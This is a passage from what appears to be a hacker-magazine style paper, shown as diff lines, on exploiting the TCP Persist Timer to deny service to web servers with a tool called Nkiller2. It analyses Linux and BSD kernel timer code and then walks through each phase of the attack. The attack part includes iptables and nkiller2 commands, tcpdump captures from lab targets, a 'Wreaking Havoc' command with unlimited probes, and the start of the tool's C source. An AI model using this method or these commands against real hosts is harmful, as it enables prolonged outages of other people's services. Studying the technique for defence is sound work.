+/proc/sys/net/ipv4/tcp_orphan_retries). Keep in mind, however that the RTO
+(retransmission timeout) is a dynamically computed value, varying when,
+for example, traffic congestion occurs.
+
+Practically, the case of a socket being dead is when the user application
+has been requested a small amount of data from the peer. It can then write
+the data all at once and issue a close(2) on the socket. This will result
+on a transition from TCP_ESTALISHED to TCP_FIN_WAIT_1. Normally and
+according to RFC 793, the state FIN_WAIT_1 automatically involves sending
+a FIN (doing an active close) to the peer. However Linux breaks the
+official TCP state machine, and will queue this small amount of data,
+sending the FIN only when all of it has been acknowledged.
+
+
+net/ipv4/tcp.c:
+/---------------------------------------------------------------------\
+
+void tcp_close(struct sock *sk, long timeout)
+{
+/* ... */
+        
+        /* RED-PEN. Formally speaking, we have broken TCP state
+         * machine. State transitions:
+         *
+         * TCP_ESTABLISHED -> TCP_FIN_WAIT1
+         * TCP_SYN_RECV -> TCP_FIN_WAIT1 (forget it, it's impossible)
+         * TCP_CLOSE_WAIT -> TCP_LAST_ACK
+         *
+         * are legal only when FIN has been sent (i.e. in window),
+         * rather than queued out of window. Purists blame.
+         *
+         * F.e. "RFC state" is ESTABLISHED,
+         * if Linux state is FIN-WAIT-1, but FIN is still not sent.
+
+         * F.e. "RFC state" is ESTABLISHED,
+         * if Linux state is FIN-WAIT-1, but FIN is still not sent.
+         * ...
+         */
+/* ... */
+}
+
+\---------------------------------------------------------------------/
+
+
+Second Case: socket not dead -> in this case 'max_probes' keeps having
+the default value from 'tcp_retries2'. 
+
+'icsk->icsk_probes_out' stores the number of zero window probes so far.
+Its value is compared to 'max_probes' and if greater, tcp_write_err()
+is called, which will shutdown the corresponding socket (TCP_CLOSE state).
+If not, then a zero window probe is sent with tcp_send_probe0().
+
+    if (icsk->icsk_probes_out > max_probes) {
+        tcp_write_err(sk);
+    } else {
+        /* Only send another probe if we didn't close things up. */
+        tcp_send_probe0(sk);
+
+One important factor here is the 'icsk_probes_out' "regeneration" which
+takes place whenever we send an ACK, regardless of whether this ACK
+opens the window or keeps it zero. tcp_ack() from tcp_input.c has a 
+line which assigns 0 to 'icsk_probes_out': 
+
+    no_queue:
+        icsk->icsk_probes_out = 0;
+
+
+We mentioned earlier that the TCP Retransmission Timer functionality is
+loosely tied to the Persist Timer. Indeed, the connecting "circle" between
+them is the 'tcp_retries2' variable. Also, remember the comment from
+above:
+
+    /* ...
+     * We are in full accordance with RFCs, only probe timer combines both
+     * retransmission timeout and probe timeout in one bottle.  --ANK
+     */
+
+tcp_retransmit_timer() calls tcp_write_timeout(), as part of it's checking
+procedures, which in turns follows a logic similar to the one we saw above
+in the Persist Timer paradigm. We can see that 'tcp_retries2' plays a
+major role here, too. 
+
+
+net/ipv4/tcp_timer.c:
+/---------------------------------------------------------------------\
+
+/*
+ *  The TCP retransmit timer.
+ */
+
+static void tcp_retransmit_timer(struct sock *sk)
+{
+/* ... */
+`
+    if (tcp_write_timeout(sk))
+        goto out;
+/* ... */
+}
+
+/* ... */
+
+/* A write timeout has occurred. Process the after effects. */
+static int tcp_write_timeout(struct sock *sk)
+{
+    /* ... */
+
+    retry_until = sysctl_tcp_retries2;
+        if (sock_flag(sk, SOCK_DEAD)) {
+            const int alive = (icsk->icsk_rto < TCP_RTO_MAX);
+ 
+            retry_until = tcp_orphan_retries(sk, alive);
+
+            if (tcp_out_of_resources(sk, alive || icsk->icsk_retransmits
+                    < retry_until))
+                return 1;
+        }
+    }
+
+    if (icsk->icsk_retransmits >= retry_until) {
+        /* Has it gone just too far? */
+        tcp_write_err(sk);
+        return 1;
+    }
+
+\---------------------------------------------------------------------/
+
+
+The idea of combining the two timer algorithms is also mentioned in RFC
+1122. Specifically, Section 4.2.2.17 - Probing Zero Windows states:
+
+    "This procedure minimizes delay if the zero-window condition is due
+    to a lost ACK segment containing a window-opening update. Exponential
+    backoff is recommended, possibly with some maximum interval not
+    specified here. This procedure is similar to that of the
+    retransmission algorithm, and it may be possible to combine the two
+    procedures in the implementation."
+
+In addition, both OpenBSD and FreeBSD follow the notion of the timer
+timeout combination. We can see this from the code excerpt below (OpenBSD
+4.4).
+
+
+sys/netinet/tcp_timer.c:
+/---------------------------------------------------------------------\
+
+void
+tcp_timer_persist(void *arg)
+{
+    struct tcpcb *tp = arg;
+    uint32_t rto;
+    int s;
+
+    s = splsoftnet();
+    if ((tp->t_flags & TF_DEAD) ||
+            TCP_TIMER_ISARMED(tp, TCPT_REXMT)) {
+        splx(s);
+        return;
+    }
+    tcpstat.tcps_persisttimeo++;
+    /*
+     * Hack: if the peer is dead/unreachable, we do not
+     * time out if the window is closed.  After a full
+     * backoff, drop the connection if the idle time
+     * (no responses to probes) reaches the maximum
+     * backoff that we would use if retransmitting.
+     */
+    rto = TCP_REXMTVAL(tp);
+    if (rto < tp->t_rttmin)
+        rto = tp->t_rttmin;
+    if (tp->t_rxtshift == TCP_MAXRXTSHIFT &&
+        ((tcp_now - tp->t_rcvtime) >= tcp_maxpersistidle ||
+        (tcp_now - tp->t_rcvtime) >= rto * tcp_totbackoff)) {
+        tcpstat.tcps_persistdrop++;
+        tp = tcp_drop(tp, ETIMEDOUT);
+        goto out;
+    }
+    tcp_setpersist(tp);
+    tp->t_force = 1;
+    (void) tcp_output(tp);
+    tp->t_force = 0;
+ out:
+    splx(s);
+}
+
+\---------------------------------------------------------------------/
+
+
+This of course doesn't mean that the timers are connected in any other
+way. In fact, they are mutually exclusive, as when one of them is set
+the other is cleared.
+
+Summing up, to successfully trigger and later exploit the Persist Timer
+the following prerequisites need to be met:
+
+a) The amount of data requested needs to be big enough so that the 
+userspace application cannot write the data all at once and issue a
+close(2), thus going into FIN_WAIT_1 state and marking the socket as
+SOCK_DEAD.
+
+b) Assuming the default value of 'tcp_retries2', we need to send
+an ACK (still advertising a 0 window though) at least every less than
+15 persist timer probes. This will be long enough to reset 
+'icsk_probes_out' back to zero and thus avoid the tcp_write_err()
+pitfall.
+
+c) The zero window advertisement will have to take place immediately
+after acknowledging all the data in transit. This, of course, may include
+piggybacking the ACK of the data, with the window advertisement.
+
+It is now time to dive into the nitty-gritty details of the attack.
+
+
+
+-- [ 4 - The attack
+
+We are going to analyse the attack steps along with a tool that automates
+the whole procedure, Nkiller2. Nkiller2 is a major expansion of the
+original Nkiller I had written some time ago and which was based on the
+idea at [1]. Nkiller2 takes the attack to another level, that we shall
+discuss shortly.
+
+
+---- [ 4.1 - Kernel memory exhaustion pitfalls
+
+The idea presented at [1] was, at the time it was published, an almost
+deadly attack. Netkill's purpose was to exhaust the available kernel
+memory by issuing multiple requests that would go unanswered on the 
+receiver's end as far as the ACKing of the data was concerned. These
+requests would hopefully involve the sending of a small amount of data,
+such that the user application would write the data all at once, issue
+a close(2) call and move on to serve the rest of the requests. As we
+mentioned before, as long as the application has closed the socket, the
+TCP state is going to become FIN_WAIT_1 in which the socket is marked as
+orphan, meaning it is detached from the userspace and doesn't anymore clog
+the connection queue. Hence, a rather big number of such requests can be
+made without being concerned that the user application will run out of
+available connection slots. Each request will partially fill the 
+corresponding kernel buffers, thus bringing the system down to its knees
+after no more kernel memory is available.
+However, the idea behind Netkill no longer poses a threat to modern
+network stack implementations. Most of them provide mechanisms that
+nullify the attack's potential by instantly killing any orphan sockets,
+in case of urgent need of memory. For example, Linux calls a specific 
+handler, tcp_out_of_recources(), which deals with such situations.
+
+
+net/ipv4/tcp_timer.c:
+/---------------------------------------------------------------------\
+
+/* Do not allow orphaned sockets to eat all our resources.
+ * This is direct violation of TCP specs, but it is required
+ * to prevent DoS attacks. It is called when a retransmission timeout
+ * or zero probe timeout occurs on orphaned socket.
+ *
+ * Criteria is still not confirmed experimentally and may change.
+ * We kill the socket, if:
+ * 1. If number of orphaned sockets exceeds an administratively configured
+ *    limit.
+ * 2. If we have strong memory pressure.
+ */
+static int tcp_out_of_resources(struct sock *sk, int do_reset)
+{
+    struct tcp_sock *tp = tcp_sk(sk);
+    int orphans = atomic_read(&tcp_orphan_count);
+
+    /* If peer does not open window for long time, or did not transmit 
+     * anything for long time, penalize it. */
+    if ((s32)(tcp_time_stamp - tp->lsndtime) > 2*TCP_RTO_MAX || !do_reset)
+        orphans <<= 1;
+
+    /* If some dubious ICMP arrived, penalize even more. */
+    if (sk->sk_err_soft)
+        orphans <<= 1;
+
+    if (orphans >= sysctl_tcp_max_orphans ||
+        (sk->sk_wmem_queued > SOCK_MIN_SNDBUF &&
+         atomic_read(&tcp_memory_allocated) > sysctl_tcp_mem[2])) {
+        if (net_ratelimit())
+            printk(KERN_INFO "Out of socket memory\n");
+
+        /* Catch exceptional cases, when connection requires reset.
+         *      1. Last segment was sent recently. */
+        if ((s32)(tcp_time_stamp - tp->lsndtime) <= TCP_TIMEWAIT_LEN ||
+            /*  2. Window is closed. */
+            (!tp->snd_wnd && !tp->packets_out))
+            do_reset = 1;
+        if (do_reset)
+            tcp_send_active_reset(sk, GFP_ATOMIC);
+        tcp_done(sk);
+        NET_INC_STATS_BH(LINUX_MIB_TCPABORTONMEMORY);
+        return 1;
+    }
+    return 0;
+}
+
+\---------------------------------------------------------------------/
+
+
+The comments and the code speak for themselves. tcp_done() moves the
+TCP state to TCP_CLOSE, essentially killing the connection, which will
+probably be in FIN_WAIT_1 state at that time (the tcp_done function is
+also called by tcp_write_err() mentioned above).
+
+In addition to the above pitfall, the way Netkill works, wastes a lot of
+bandwidth from both sides, making the attack more noticeable and less
+efficient. Netkill sends a flurry of syn packets to the victim, waits for
+the SYNACK and responds by completing the 3way handshake and piggybacking
+the payload request in the current ACK. Since, any data replies from the
+victim's user application (usually a web server) will go unanswered, TCP
+will start retransmitting these packets. These packets, however, are ones
+that carry a load of data with them, whose size is proportional to the
+initial window and mss advertised. The minimum amount of data is usually
+512 bytes, which given the vast amount of retransmissions that will
+eventually take place, can lead to network congestion, lost packets and
+sysadmin red alarms.
+
+As we can see, kernel memory exhaustion is not an easily accomplished
+option in today's operating systems, at least by means of a generic DoS
+attack. The attack vector has to be adapted to current circumstances.
+
+
+---- [ 4.2 - Attack Vector
+
+Our goal is to perform a generic DoS attack that meets the following
+criteria:
+
+a) The duration of the attack has to be prolonged as long as possible. The
+TCP Persist Timer exploitation extends the duration to infinity. The only
+time limits that will take place will be the ones imposed by the userspace
+application.
+
+b) No resources will be spent on our part to keep any kind of state 
+information from the victim. Any memory resources spent will be O(1),
+which means regardless of the number of probes we send to the victim, our
+own memory needs will never surpass a certain initial amount.
+
+c) Bandwidth throttling will be kept to a minimum. Traffic congestion has
+to be avoided if possible. 
+
+d) The attack has to affect the availability of both the userspace
+application as well as the kernel, at the extent that this is feasible.
+
+
+To meet requirement 'b', we are going to use a packet-triggering behaviour
+and the, now old, technique of reverse (or client) syn cookies. Basically,
+this means that our answers will strictly depend on nothing else other 
+than the packets received from the victim. How is this even possible? We
+are going to use a series of packet-parsing techniques and craft the
+packets in such a way that they carry within themselves any information
+that is needed to make decisions.
+
+
+The general procedure will go like this:
+
+- Phase 1.
+
+Attacker sends a group of SYN packets to the victim. In the sequence
+number field, he has encoded a magic number that stems from the
+cryptographic hash of { destination IP & port, source IP & port } and a
+secret key. By this way, he can discern if any SYNACK packet he gets,
+actually corresponds to the SYN packets he just sent. He can accomplish
+that by comparing the (ACK seq number - 1) of the victim's SYNACK reply
+with the hash of the same packet's socket quadruple based on the secret
+key. We subtract 1, since the SYN flag occupies one sequence number
+as stated by RFC 793. The above technique is known as reverse syn cookies,
+since they differ from the usual syn cookies which protect from syn
+flooding, in that they are used from the reverse side, namely the client
+and not the server. Responsible for the cookie calculation and subsequent
+encoding is Nkiller2's calc_cookie() function.
+Now, apart from the sequence number encoding, we are also going to use a
+nifty facility that TCP provides, as means to our own ends. The TCP
+Timestamp Option is normally used as another way to estimate the RTT.
+The option uses two 32bit fields, 'tsval' which is a value that increases
+monotonically by the TCP timestamp clock and which is filled in by the
+current sender and 'tsecr' - timestamp echo reply - which is the peer's
+echoed value as stated in the tsval of the packet to which the current one
+replies. The host initiating the connection places the option in the
+first SYN packet, by filling tsval with a value, and zeroing tsecr. Only
+if the peer replies with a Timestamp in the SYNACK packet, can any future
+segments keep containing the option. build_timestamp() embeds the
+timestamp option in the crafted TCP header, while get_timestamp() extracts
+it from a packet reply.
+
+      TCP Timestamps Option (TSopt):
+
+         Kind: 8
+
+         Length: 10 bytes
+
+          +-------+-------+---------------------+---------------------+
+          |Kind=8 |  10   |   TS Value (TSval)  |TS Echo Reply (TSecr)|
+          +-------+-------+---------------------+---------------------+
+              1       1              4                     4
+
+We are going to use the Timestamp option as a means to track time. We will
+later have to exploit the TCP Persist Timer and eventually answer to some
+of his probes, but this will have to involve calculating how much time has
+passed. Consequently, we are going to encode our own system's current time
+inside the first 'tsval'. In the SYNACK reply that we are going to get,
+'tsecr' will reflect that same value. Thus, by subtracting the value
+placed in the echo reply field from the current system time, we can deduce
+how much time has passed since our last packet transmission without
+keeping any stateful information for each probe. We are going to extract
+and encode timestamp information from every packet hereafter. Timestamps
+are supported by every modern network stack implementation, so we aren't
+going to have any trouble dealing with them.
+
+
+- Phase 2.
+
+The victim replies with a SYNACK to each of the attacker's initial SYN
+probes. These kinds of packets are really easy to differentiate between
+the rest of the ones we will be receiving, since no other packet will
+have both the SYN flag and the ACK flag set. In addition, as we noted
+above, we can realize if these packets actually belong to our own probes
+and not some other connection happening at the same time to the host, by
+using the reverse syn cookie technique. 
+We have to mention here that under no circumstances should our system's 
+kernel be let to affect any of our connections. Thus, we should take care
+beforehand to have filtered any traffic destined to or coming from the 
+victim's attacked ports.
+Having gotten the victim's SYNACK replies, we complete the 3way handshake
+by sending the ACK required (send_probe: S_SYNACK). We also piggyback the
+data of the targeted userspace application request. We save bandwidth,
+time and trouble by adopting a perfectly allowable behaviour. Nothing
+else exciting happens here.
+
+
+- Phase 3.
+
+Now things get a bit more complicated. It is here that the road starts
+forking depending on the target host's network stack implementation.
+Nkiller2 uses the notion of virtual states, as I called them, which are
+a way to differentiate between each unique case by parsing the packet
+for relevant information. The handler responsible for parsing the victim's
+replies and deciding the next virtual state is check_replies(). It sets
+the variable 'state' accordingly and main() can then deduce inside it's
+main loop the next course of action, essentially by calling the generic
+send_probe() packet-crafter with the proper state argument and updating
+some of its own loop variables.
+
+First case: the target host sends a pure ACK (meaning a packet with no
+data), which acknowledges our payload sent in Phase 2. This virtual
+state is mentioned as S_FDACK (State - First Data Acknowledgment) in the
+Nkiller2 codebase.
+
+Second case: the target host sends the ACK which acknowledged our payload
+from Phase 2, piggybacked with the first data reply of the userspace
+application to which we made the request. This usually happens due to the
+Delayed Acknowledgment functionality according to which, TCP waits some
+time (class of microseconds) to see if there are any data which it can
+send along with an ACK. 
+
+Usually, Linux behaviour follows the first case while *BSD and Windows
+follow the second. The critical question here is when to send the zero
+window advertisement. Ideally, we could reply to the first case's pure
+ACK with an ACK of our own (with the same acknowledgment number as the 
+sequence number in the victim's packet) that advertised a zero window.
+However, in most cases we won't have that chance, since the victim's
+TCP will send, immediately after this pure ACK, the first data of the
+userspace application in a separate segment. Thus, if we advertise a
+zero window when the opposite TCP has already wrote to the network
+the first data, we will fail to trigger the Persist Timer as we saw
+during the analysis in part 3 of this paper. Consequently, we play it
+safe and choose to ignore the FDACK and wait for the first segment of
+data to arrive.
+
+
+- Phase 4 
+
+This stage also differs from one operating system to another, since it
+is deeply connected to Phase 3. For every number mentioned from now on,
+assume that Nkiller's initial window advertisement and mss is 1024.
+Linux, under normal circumstances, will send two data segments with a 
+minimum amount of 512 bytes each. Additionally, any data segment following
+the first one, will have the PUSH flag set. On the other hand, *BSD and 
+BSD-derivative implementations will send one bigger data segment of 1024
+bytes, without setting the PUSH flag.
+To be able to take the right decisions for each unique case involved,
+Nkiller2 will have to be provided with a template number. It is trivial to
+identify the different network stacks by using already existing tools, so
+when you are unsure about the target system, either use Nmap's OS
+fingerprinting capability or at worst, a trial-and-error method. At the
+moment with only 2 different templates (T_LINUX and T_BSDWIN), Nkiller2
+is able to work against a vast amount of systems.
+In the default template (Linux), Nkiller2 is going to send a zero window
+advertisement on the ACK of the second segment (which is going to involve
+acking the first segment as well), while when dealing with BSD or Windows,
+it will send it on the ACK of the first and only data segment. The
+resolving between these two cases takes place in send_probe()'s main body
+in 'case S_DATA_0' (State - Data 0, as in first data packet).
+
+
+- Phase 5
+
+Having successfully sent the zero window packet (regardless of how and
+when that happened), the target host's TCP will start sending zero probes.
+This is where we accomplish meeting requirement 'c' - bandwidth waste
+limitation. Every retransmission that will take place, will involve pure
+ACKs (Linux) or at maximum 1 byte of data (BSD/Windows). Every zero probe
+is only 52 bytes long, counting TCP/IP headers and the TCP Timestamp
+option, in contrast with the size of the retransmission packets 
+(512 + 40 bytes or 1024 + 40 bytes each) that would take place if we had
+triggered the TCP retransmission timer, as in netkill's case.
+An interesting issue here is to decide on when is the best time to reply
+to the zero probes, so that the TCP persist timer is ideally prolonged to
+last forever with the fewest packets possible. Using the TCP timestamp
+technique, we can calculate the time elapsed from the moment we sent the
+zero window advertisement (since that was our last packet and that one's
+time value will be echoed in 'tsecr') to the moment we got the packet.
+
+
+check_replies()
+/---------------------------------------------------------------------\
+
+
+      if (get_timestamp(tcp, &tsval, &tsecr)) {
+        if (gettimeofday(&now, NULL) < 0)
+          fatal("Couldn't get time of day\n");
+        time_elapsed = now.tv_sec - tsecr;
+        if (o.debug) 
+          (void) fprintf(stdout, "Time elapsed: %u (sport: %u)\n",
+              time_elapsed, sockinfo.sport);
+      }
+
+      ...
+
+      if (ack == calc_ack && (!datalen || datalen == 1) 
+          && time_elapsed >= o.probe_interval) {
+        state = S_PROBE;
+        goodone++;
+        break;
+      }
+
+\---------------------------------------------------------------------/
+
+
+Hence, we can decide on whether or not we should send a reply to the
+current zero probe (S_PROBE), depending on a predetermined rough estimate
+of the time lapse. We also use this 'probe_interval' value to
+differentiate between a zero probe and the FDACK, since there are no other
+packet characteristics, apart from time arrival, that we can take into
+account in this stateless manner. This phase marks the accomplishment of
+our 1st goal - prolonging the attack to as much as possible.
+
+
+A graphical representation of the procedure is shown below. Remember that
+the states are purely virtual. We do not keep any kind of information on
+our part.
+
+
+      (cookie OK)   +----------+ 
+ SYN -------------> | S_SYNACK | 
+      rcv SYNACK    +----------+ 
+                          |       
+               ACK SYNACK |
+            send request  |
+                          |     pure ACK       +---------+ 
+                          | ---------------->  | S_FDACK | 
+                          |   time_elapsed <   +---------+ 
+                          |   probe_interval      ignore
+                          |
+                 got Data |   
+                          V                         
+                     +----------+       
+                     | S_DATA_0 |
+                     +----------+       
+                          |
+                         / \
+                        /   \ 
+          T_BSDWIN     /     \   T_LINUX (default)
+      ----------------/       \ ---------------        
+      |                                       |
+      |                                       | got Data (PSH)
+      |                                       | ACK(data0)
+      V                                       V
+  ACK(data0) &                          +----------+
+  send 0 window                         | S_DATA_1 |      
+      |                                 +----------+
+      |---------------         ---------------|
+                      \       /   ACK(data1) & send 0 window
+                       \     /
+                        \   /
+                         \ /
+     |------> time_elapsed >= probe_interval
+     |                    |
+     |                    |
+     |                    V
+     |               +---------+
+     |               | S_PROBE | --------> send probe reply
+     |               +---------+
+     |                    |    
+     |--------------------|
+
+
+The only thing that still needs to be answered is to what extent we have
+achieved goal 'd'. How efficient is the attack really? The answer is, that
+it depends on what we are attacking. Attacking one userspace application
+will usually lead to either backlog queue collapse or reaching the maximum
+allowable number of concurrent accepted connections. In both cases, the
+availability of the userspace application will drop down to zero and will
+stay in that condition for a possibly unlimited amount of time. Keep in
+mind though that robust server applications like Apache have a Timeout of
+their own, which is independent of TCP's. Quoting from Apache's manual:
+
+   "The TimeOut directive currently defines the amount of time Apache will
+    wait for three things:
+
+   1. The total amount of time it takes to receive a GET request.
+   2. The amount of time between receipt of TCP packets on a POST or PUT
+        request.
+   3. The amount of time between ACKs on transmissions of TCP packets in
+        responses."
+
+By default, Apache httpd's TimeOut = 300 which means 5 minutes. Following
+a similar approach, lighttpd's default timeout is about 6 minutes.
+Even then, as long as the attack cycle continues (Hint: Nkiller's option
+-n0), there is no hope for any server not protected by a stateful firewall
+that limits the total number of packets reaching the host (which still
+won't be enough by itself given the TCP Persist Timer's exploitation).
+
+At the same time, useful kernel resources are wasted on the SendQueue of
+each established connection. However, for kernel memory exhaustion to
+occur, we will have to perform a concurrent attack at multiple
+applications (Nkiller2 isn't optimized for this though). By this way,
+the amount of kernel resources wasted will be proportional to the number
+of the attacked applications and the amount of successful connections on
+each of them. Even if one service is brought down temporarily for one
+reason or another, there will still be the other applications wasting
+memory with a filled up TCP SendQueue.
+
+
+---- [ 4.3 Test cases
+
+Time for some real world examples. We are going to demonstrate how
+Nkiller2 exploits the Persist Timer functionality and at the same time
+point out the different behaviour that is exhibited from a Linux system
+in contrast with an OpenBSD system. The file requested has to be more
+than 4.0 Kbytes (experimental value).
+
+- Test Case 1.
+
+Attacker: 10.0.0.12, Linux 2.6.26
+Target: 10.0.0.50, Apache1.3, OpenBSD 4.3
+
+# iptables -A INPUT -s 10.0.0.50 -p tcp --dport 80 -j DROP
+# iptables -A INPUT -s 10.0.0.50 -p tcp --sport 80 -j DROP
+# ./nkiller2 -t 10.0.0.50 -p80 -w /file -v -n1 -T1 -P120 -s0 -g
+
+Starting Nkiller 2.0 ( http://sock-raw.org )
+Probes: 1
+Probes per round: 100
+Pcap polling time: 100 microseconds
+Sleep time: 0 microseconds
+Key: Nkiller31337
+Probe interval: 120 seconds
+Template: BSD | Windows
+Guardmode on
+
+
+# tcpdump port 80 and host 10.0.0.50 -n
+
+08:55:30.017021 IP 10.0.0.12.40428 > 10.0.0.50.80: S 3456779693:
+3456779693(0) win 1024 <timestamp 1232693730 0,nop,nop,mss 1024>
+08:55:30.017280 IP 10.0.0.50.80 > 10.0.0.12.40428: S 3072651811:
+3072651811(0) ack 3456779694 win 16384 <mss 1460,nop,nop,timestamp
+464912143 1232693730>
+08:55:30.017461 IP 10.0.0.12.40428 > 10.0.0.50.80: . 1:23(22) ack 1
+win 1024 <timestamp 1232693730 464912143,nop,nop>
+08:55:30.019288 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1:1013(1012) ack 23
+win 17204 <nop,nop,timestamp 464912143 1232693730>
+08:55:30.019311 IP 10.0.0.12.40428 > 10.0.0.50.80: . ack 1013 win 0
+<timestamp 1232693730 464912143,nop,nop>
+08:55:35.009929 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
+win 17204 <nop,nop,timestamp 464912153 1232693730>
+08:55:40.009505 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
+win 17204 <nop,nop,timestamp 464912163 1232693730>
+08:55:45.009056 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
+win 17204 <nop,nop,timestamp 464912173 1232693730>
+08:55:53.008388 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
+win 17204 <nop,nop,timestamp 464912189 1232693730>
+08:56:09.007027 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
+win 17204 <nop,nop,timestamp 464912221 1232693730>
+08:56:41.004286 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
+win 17204 <nop,nop,timestamp 464912285 1232693730>
+08:57:40.999239 IP 10.0.0.50.80 > 10.0.0.12.40428: . 1013:1014(1) ack 23
+win 17204 <nop,nop,timestamp 464912405 1232693730>
+08:57:40.999910 IP 10.0.0.12.40428 > 10.0.0.50.80: . ack 1013 win 0
+<timestamp 1232693860 464912405,nop,nop>
+...
+
+
+Notice that OpenBSD transmits httpd's initial data in one segment in which
+the ACK to our payload is included. Nkiller2 acknowledges that packet,
+advertising at the same time a zero window. After that, OpenBSD's TCP
+transmits a zero probe and sets the Persist Timer. After a little more
+than 120 seconds (57:40 - 55:30), we answer to the Persist Timer's probe.
+Note that we specified the probe_interval with the option -P120
+(approximately 120 seconds).
+
+
+- Test Case 2.
+
+Attacker: 10.0.0.12, Linux 2.6.26
+Target: 10.0.0.101, Apache2.2.3, Debian "etch" (2.6.18)
+
+# iptables -A INPUT -s 10.0.0.101 -p tcp --dport 80 -j DROP
+# iptables -A INPUT -s 10.0.0.101 -p tcp --sport 80 -j DROP
+# ./nkiller2 -t 10.0.0.101 -p80 -w /file -n1 -T0 -P50 -s0 -v
+
+Starting Nkiller 2.0 ( http://sock-raw.org )
+Probes: 1
+Probes per round: 100
+Pcap polling time: 100 microseconds
+Sleep time: 0 microseconds
+Key: Nkiller31337
+Probe interval: 50 seconds
+Template: Linux
+
+
+# tcpdump port 80 and host 10.0.0.101 -n
+
+01:09:33.350783 IP 10.0.0.12.26528 > 10.0.0.101.80: S 3497611066:
+3497611066(0) win 1024 <timestamp 1232752173 0,nop,nop,mss 1024>
+01:09:33.350893 IP 10.0.0.101.80 > 10.0.0.12.26528: S 2167814821:
+2167814821(0) ack 3497611067 win 5792 <mss 1460,nop,nop,timestamp
+4294906445 1232752173>
+01:09:33.351189 IP 10.0.0.12.26528 > 10.0.0.101.80: . 1:23(22) ack 1
+win 1024 <timestamp 1232752173 4294906445,nop,nop>
+01:09:33.351308 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294906445 1232752173>
+01:09:33.382100 IP 10.0.0.101.80 > 10.0.0.12.26528: . 1:513(512) ack 23
+win 5792 <nop,nop,timestamp 4294906452 1232752173>
+01:09:33.382138 IP 10.0.0.101.80 > 10.0.0.12.26528: P 513:1025(512) ack 23
+win 5792 <nop,nop,timestamp 4294906452 1232752173>
+01:09:33.389359 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 513 win 512
+<timestamp 1232752173 4294906452,nop,nop>
+01:09:33.389508 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 1025 win 0
+<timestamp 1232752173 4294906452,nop,nop>
+01:09:33.590164 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294906505 1232752173>
+01:09:33.998135 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294906607 1232752173>
+01:09:34.814073 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294906811 1232752173>
+01:09:36.445959 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294907219 1232752173>
+01:09:39.709739 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294908035 1232752173>
+01:09:46.237279 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294909667 1232752173>
+01:09:59.292377 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294912931 1232752173>
+01:10:25.402550 IP 10.0.0.101.80 > 10.0.0.12.26528: . ack 23 win 5792
+<nop,nop,timestamp 4294919459 1232752173>
+01:10:25.427760 IP 10.0.0.12.26528 > 10.0.0.101.80: . ack 1024 win 0
+<timestamp 1232752225 4294919459,nop,nop>
+...
+
+
+Linux first sends a pure ACK (which is ignored by Nkiller2) and then
+transmits the first 2 data segments (512 bytes each). Nkiller2 waits until
+both of them arrive and acknowledges them with one zero window ACK packet.
+Linux then starts sending us zero probes (which have a datalength equal to
+zero in constrast with *BSD which send 1 byte of data), that go unanswered
+until about (10:25 - 09:33) 50 seconds pass.
+
+
+- Test Case 'Wreaking Havoc'
+
+# nkiller2 -t <target> -p80 -w <path> -n0 -T0 -P100 -s0 -v -N100
+
+-n0: unlimited probes
+-N100: will send 100 SYN probes per round (a round finishes when
+we either get a data segment or a zero probe)
+
+Use at your own discretion.
+
+
+
+-- [ 5 - Nkiller2 implementation 
+
+/*
+ *  Nkiller 2.0 - a TCP exhaustion/stressing tool
+ *  Copyright (C) 2009 ithilgore <ithilgore.ryu.L@gmail.com>
+ *  sock-raw.org
+ *
+ *  This program is free software: you can redistribute it and/or modify
+ *  it under the terms of the GNU General Public License as published by
+ *  the Free Software Foundation, either version 3 of the License, or
+ *  (at your option) any later version.
+ *
+ *  This program is distributed in the hope that it will be useful,
+ *  but WITHOUT ANY WARRANTY; without even the implied warranty of
+ *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ *  GNU General Public License for more details.
+ *
+ *  You should have received a copy of the GNU General Public License
+ *  along with this program.  If not, see <http://www.gnu.org/licenses/>.
+ */
+
+/*
+ * COMPILATION:
+ *  gcc nkiller2.c -o nkiller2 -lpcap -lssl -Wall -O2
+ * Has been tested and compiles successfully on Linux 2.6.26 with gcc
+ * 4.3.2 and FreeBSD 7.0 with gcc 4.2.1
+ */
+
+
+/*
+ * Enable BSD-style (struct ip) support on Linux.
+ */
+#ifdef __linux__
+# ifndef __FAVOR_BSD
+#  define __FAVOR_BSD
+# endif
+# ifndef __USE_BSD
+#  define __USE_BSD
+# endif
+# ifndef _BSD_SOURCE
+#  define _BSD_SOURCE
+# endif
+# define IPPORT_MAX 65535u
+#endif
+
+
+#include <sys/types.h>
+#include <sys/socket.h>
+
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <netinet/in_systm.h>
+#include <netinet/ip.h>
+#include <netinet/tcp.h>
+
+#include <openssl/hmac.h>
+
+#include <errno.h>
+#include <pcap.h>
+#include <stdarg.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sysexits.h>
+#include <time.h>
+#include <unistd.h>
+#include <getopt.h>
+
+
+#define DEFAULT_KEY             "Nkiller31337"
+#define DEFAULT_NUM_PROBES      100000
+#define DEFAULT_PROBES_RND      100
+#define DEFAULT_POLLTIME        100
+#define DEFAULT_SLEEP_TIME      100
